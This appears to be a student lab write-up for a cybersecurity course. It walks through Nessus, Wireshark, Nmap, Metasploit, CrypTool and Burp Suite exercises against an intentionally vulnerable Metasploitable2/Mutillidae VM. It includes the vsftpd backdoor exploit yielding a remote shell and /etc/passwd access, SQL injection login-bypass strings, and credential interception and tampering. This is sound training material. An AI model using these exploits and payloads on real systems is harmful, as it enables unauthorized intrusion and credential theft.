1. a) Imagine you are working as a cybersecurity analyst for a financial institution, you
have been assigned the critical task of conducting a Nessus vulnerability analysis on a
critical host system (windows, Linux) in the local network hosting sensitive customer
data. Detail your step-step approach, including pre-scan preparations, specific Nessus
configurations for maximum efficacy in an environment, scan the targets, prioritize and
analyse the results and generate reports.

Nessus is a remote security scanning tool, which scans a computer and raises an alert if
it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network. It does this by running over 1200 checks
on a given computer, testing to see if any of these attacks could be used to break into
the computer or otherwise harm it.
Nessus, developed by Tenable Inc, is a widely-used open-source vulnerability scanner
Nessus provides a range of services, including vulnerability assessments, network scans,
web scans, asset discovery, and more, to aid security professionals, penetration testers,
and other cybersecurity enthusiasts in proactively identifying and mitigating
vulnerabilities in their networks.
Nessus tool for vulnerability scanner
https://www.tenable.com/products/nessus/nessus-essentials
Installing Nessus on kali Linux
1. Download the Nessus package for Debian on the Nessus website and make
sure you set the Platform to Linux-Debian-amd64.
2. When it's finished downloading, open your Linux terminal and navigate to
the location you downloaded the Nessus file to.
3. Install Nessus using this command:
sudo dpkg -i Nessus-10.4.1-debian9_amd64.deb
4. Start the Nessus service with this command:
sudo systemctl start nessusd.service
5. On your browser, go to https://kali:8834/. It would show a warning page.
6. Click on Advanced. Then, click on Accept Risk and Continue.
7. Choose the Nessus Product you prefer. If you want the free version of
Nessus, click on Nessus Essentials.

8. Enter your name and email address to receive an activation code by email.
Paste the activation code into the space provided and choose a username and
password.
9. Allow Nessus to download the necessary plugins.
10. Once the plugin downloads have completed, you can start using the Nessus
service.

Passwd Change
/opt/nessus/sbin/nessuscli chpasswd shubha
After installing the required plugins, navigate to the 'newscan' module. Enter the IP
address of the Metasploitable2 target for scanning. You have the flexibility to schedule
scans for specific times or days, or perform OnDemand scanning.
Select from various scan options such as host discovery, basic scan, or advanced scan.
Once the scanning process is finished, proceed to analyse the vulnerabilities
categorized by their severity levels such as medium, high, or critical, along with their
respective CVSS (Common Vulnerability Scoring System) scores.
Check for available remediations for each vulnerability and generate a comprehensive
PDF report summarizing the scan results, including identified vulnerabilities, their
severity, CVSS scores, and recommended actions for mitigation.
.
Note: After installing Nessus on Kali Linux, ensure that the nessusd service is running
every time you log in. This ensures continuous availability of Nessus functionality
Systemctl start nessusd.service
https://kali:8834 in the browser.

1. b) As part of a penetration testing engagement for a client, you're tasked with evaluating
the security of their internal network. You suspect that sensitive data might be leaking
from one of their development servers due to a potential misconfiguration or a
compromised machine within their network. To investigate further, you plan to intercept
network traffic using Wireshark to identify any unauthorized data transfers.

Wireshark is a widely used, open source network analyzer that can capture and display
real-time details of network traffic. It is particularly useful for troubleshooting network
issues, analyzing network protocols and ensuring network security.

Networks must be monitored to ensure smooth operations and security. Popular with
academic institutions, government agencies, corporations and nonprofits, Wireshark is
one such tool that can offer an in-depth view into network activities, diagnose network
performance issues or identify potential security threats.

Wireshark -Snipping
Intercept target machine traffic(Metaspoiltable2 VM) with Wireshark
• Ensure both the Kali Linux and Metasploitable2 virtual machines are up
and running.
• Open Kali Linux and navigate to Applications -> Snipping & Spoofing ->
Wireshark.
• Select the interface (eth0) to capture network traffic.
• Access the browser on Kali Linux and enter the IP address of the
Metasploitable2 VM (e.g., 192.168.62.129) to open the Mutillidae
website.
• Navigate to Mutillidae page and proceed to the login page.
• Enter random credentials (e.g., username: admin, password: 12345) and
attempt to log in, resulting in a login failure message.
• Switch to Wireshark, where traffic interception has begun.
• In the filter bar, type "http" and select the http with post stream contains
login.php page.
• Right-click on HTTP traffic, choose "Follow," then "HTTP stream" to
open a new window.
• The new window displays intercepted traffic containing the username and
password entered on the DVWA login page, showcasing successful
traffic interception using Wireshark.

2. a. As a member of Blue team experts in Monitoring and Technical Support of
a medium sized company, you have been asked to assess the security posture of
the internal network. Use Nmap for network discovery, Port scanning, Service
version detection and vulnerability detection. Then Document your findings,
including the identified vulnerabilities, their severity levels.

Nmap ("Network Mapper") is a free and open source utility for network discovery
and security auditing. Many systems and network administrators also find it

useful for tasks such as network inventory, managing service upgrade schedules,
and monitoring host or service uptime. Nmap uses raw IP packets in novel ways
to determine what hosts are available on the network, what services (application
name and version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in use, and
dozens of other characteristics. It was designed to rapidly scan large networks,
but works fine against single hosts. Nmap runs on all major computer operating
systems, and official binary packages are available for Linux, Windows, and Mac
OS X.

Nmap Scanning:
• Open Kali Linux and the Metasploitable2 virtual machine.
• Obtain the IP address of the target machine (Metasploitable2 VM).
• Open the terminal in Kali Linux.
• Perform scanning using the following commands with nmap:
1. nmap 192.168.62.129
2. sudo nmap -v 192.168.62.129—(v-verbose-detailed output)
3. man nmap
4. nmap -V 192.168.62.129—(V-version)
5. nmap 192.168.62.129 192.168.62.130
6. nmap 192.168.62.0/24 --exclude 192.168.62.130
7. nmap --open 192.168.62.129(showing only the open ports)
8. nmap -A 192.168.62.129(Aggressive scan)
9. nmap -sA 192.168.62.129(The packets sent to target machine are getting
filtered or not)
10.nmap -p 80 192.168.62.129(Port 80)
11.nmap --packet-trace 192.168.62.129 ((Complete tracing of packets)
12.nmap --top-ports 10 192.168.62.129

OS Detection:-
• nmap -O 192.168.62.129
• nmap -v -O 192.168.62.129—revealing additional info..
• nmap -O --osscan-guess 192.168.62.129(proposed option)
Service Detection:-
• nmap -sV -O 192.168.62.129

• Nmap -sV --version-trace 192.168.62.129
Advanced Scan:-
• nmap -sS 192.168.62.130 (TCP Syn Scanning)
• nmap -sT 192.168.62.129 (TCP Connect scan)
• nmap -sU 192.168.62.129(UDP scans..)
• sudo nmap -sN 192.168.62.129(TCP null Sync scan)
• sudo nmap -sF 192.168.62.129(TCP FIN scan—Setting the FIN bit)

Custom scan:-
nmap -sS --scanflags SYNFIN -T4 www.google.com
nmap -sO 192.168.62.129(IP protocol scan)
Send Ethernet packets:
nmap --send-eth 192.168.62.129
Send IP packets
nmap --send-ip 192.168.62.129

2.b. Imagine you are a member of Red Team in a company, you have been assigned a
penetration testing task to assess the security of a corporate network using Kali Linux and the
Metasploit framework. Outline a step-by-step process for utilizing Metasploit to identify and
exploit vulnerabilities within the network.

• Ensure both the Kali Linux and Metasploitable2 virtual machines are up
and running.
• Open Kali Linux terminal, type following cmds
# msfupdate—"Use this if metaspoilt-framework is more than two weeks
old.Run msfupdate to get latest framework”
➢ msfconsole
➢ use exploit/unix/ftp/vsftpd_234_backdoor
➢ show options
➢ set RHOST 192.168.62.129
➢ exploit
➢ It will open the shell of target IP(metaspoiltable vm)
➢ Create a file say 1.txt with some contents, copy the file to another
new file.

➢ Now goto Metaspoiltable VM 2 and check the same file contents.
➢ Even the sensitive details such contents of /etc/passwd file also can
be accessed.

3. Imagine a legal firm handling contracts for clients remotely. Let’s say a client, Mr.
John, needs to sign a contract for a property purchase. how could Cryptool be applied
to digitally sign a contract document, authenticate its validity, and ensure the secure
storage of both the digital signature and the original document? Demonstrate the use
of digital signatures using cryptool by performing following things:

a) Creation of signature
b) Storing the signature
c) Verifying the signature

Digital Signature: -

Demo: -
• Download Cryptool2 on windows machine.
https://www.cryptool.org/en/ct2/downloads
Download .exe stable version(165.65MB)

• Install Cryptool

• Perform Encryption and Decryption using RSA algorithm and Create hashes
for the file using SHA algorithm

Encryption: -

Decryption: -

4. Imagine you're a cybersecurity analyst tasked with assessing the security of a newly
developed e-commerce website. You would utilize Burp suite and perform following activities
to identify and mitigate security flaws in the web application. Start by describing the setup
process for Burp Suite, including configuring proxy settings and initiating automated scans to
detect common vulnerabilities like SQL Injection.
i. Manual Testing of SQL Injection
ii. Proxy Attack with Burp Suite.

i) Manual testing for SQL injection: -
Setting mutillidae app correctly for SQL injection Vulnerability Testing
Go to the target machine(Metaspoiltable 2)—in the terminal type below commands

cd /var/www/mutillidae
sudo nano config.inc
Ensure dbname=owasp10 instead of metasploit
Then save(ctrl+X, Y and enter ) and exit.
In the kali linux browser
192.168.62.129
Go to mutillidae and enter the username as ‘ and password field is empty , click on enter
It displays errors, which indicates web application is vulnerable
It displays the query in the Diagnotic information.

• Now again click login/Register enter username as admin
Password as blahblah ‘ OR 6=6#

Then you can observe it is logged in as admin.
• Now trying with username as admin ‘ # and password field must be empty, still you can
observe it is logging in as admin.

• In mutillidae page, click on OwaspTOP10->A1 injection -> SQLi Extract Data -> User Info and
Enter username=admin and password =adminpass , click on view account details
Then Results for admin. 1 records found would be displayed
Username=admin

Password=adminpass
Signature= Monkey

• Now for SQLi
Enter username=admin and password= ‘ OR 1=’1--
Click on view account details. Then you would observe Results for admin. 16 records found details...

ii) Proxy Attack with Burp suite.
• Start both the Kali Linux virtual machine and the Metasploitable 2 virtual machine to ensure
they are up and running.
• Navigate to the "Applications" menu in Kali Linux and launch the Burp Suite application.
• After Burp Suite has launched, set up the proxy configuration.
• Download the Burp Suite certificate and import it into the relevant certificate store.
• Access the proxy settings within Burp Suite and configure a manual proxy setup with the
HTTP proxy set to 127.0.0.1 and port number 8080. Confirm the settings by clicking "OK."
• Open the Mutillidae application and log in using the credentials: username - "john" and
password - "passwd." Before clicking on the login button, activate the intercept feature in
Burp Suite. Proceed to click on the login button in Mutillidae.
• Check the Burp Suite application to verify that it captured the login request, including the
username and password information.
• Modify the username and password to "admin" and "adminpass" respectively within Burp
Suite. Then, click "Forward" to send the modified request.
• Once the modified request is forwarded, observe in the Mutillidae application that the login
is successful, indicating that the credentials have been changed to admin/adminpass.
• Within the Burp Suite application, navigate to the "Target" tab to review the intercepted
information from the target machine.

